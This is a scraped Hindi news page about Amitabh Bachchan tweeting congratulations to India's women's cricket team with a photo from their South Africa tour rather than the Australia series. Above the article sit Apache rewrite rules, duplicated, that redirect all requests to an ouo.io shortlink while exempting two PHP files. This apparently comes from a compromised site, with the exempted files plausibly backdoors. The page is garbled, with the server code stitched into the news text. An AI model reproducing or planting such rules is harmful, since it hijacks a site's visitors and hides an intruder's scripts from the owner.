
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 773
Nextनई दिल्ली। महानायक अमिताभ बच्चन अपने ट्विटर अकाउंट पर महिला क्रिकेट टीम इंडिया को बधाई देते हुए बड़ी गलती कर बैठे। उन्होंने आज महिला टीम इंडिया की एक फोटो को अपनी फोटो के साथ ट्वीट करते हुए उसे जीत की बधाई दी। उन्होंने महिला टीम इंडिया को ऑस्ट्रेलिया के खिलाफ सीरीज में जीत के लिए बधाई दी। यहीं वह बड़ी गलती कर बैठे। क्योंकि ये फोटो महिला टीम इंडिया को अफ्रीका में मिली जीत के बाद की थी। न कि ऑस्ट्रेलिया के खिलाफ मिली जीत की। इसके बाद लोगों ने उन्हें उनकी गलती का अहसास कराया। अमिताभ बच्चन ने ट्वीट करते हुए लिखा ऑस्ट्रेलिया के खिलाफ इस ऐतिहासिक जीत के लिए बधाई महिला टीम इंडिया। भारतीय टीम ने बल्लेबाजी, फील्डिंग में कमाल का प्रदर्शन दिखाया। खासकर जेमिमा रोड्रिग्ज का बाउंड्री पर कमाल का कैच लिया। आप पर हमें गर्व है। अमिताभ बच्चन के ट्वीट पर पहले तो लोगों ने भी बधाई देनी शुरू कर दी। लेकिन इसके बाद लोगों ने उन्हें उनकी गलती की ओर ध्यान दिलाया। लोगों ने कहा ये फोटो ऑस्ट्रेलिया नहीं अफ्रीका सीरीज के समय की है।
गौरतलब है कि उसी समय टीम इंडिया ने अफ्रीका को उसी के घर में वनडे और टी20 सीरीज में हराया था। ऑस्ट्रेलिया के साथ भारतीय महिला टीम के वनडे मैचों की शुरुआत 12 मार्च से बड़ोदरा में होगी। ये सीरीज 3 मैचों की होगी। गौरतलब है कि महिला टीम फरवरी में अफ्रीका के दौरेे पर गई थी। उस सीरीज में उसने 3 वनडे और 5 टी20 मैच खेले थे। महिला टीम ने दोनों सीरीज में अफ्रीका टीम को मात दी थी। इसी की फोटो को अमिताभ बच्चन ने आज शेयर की।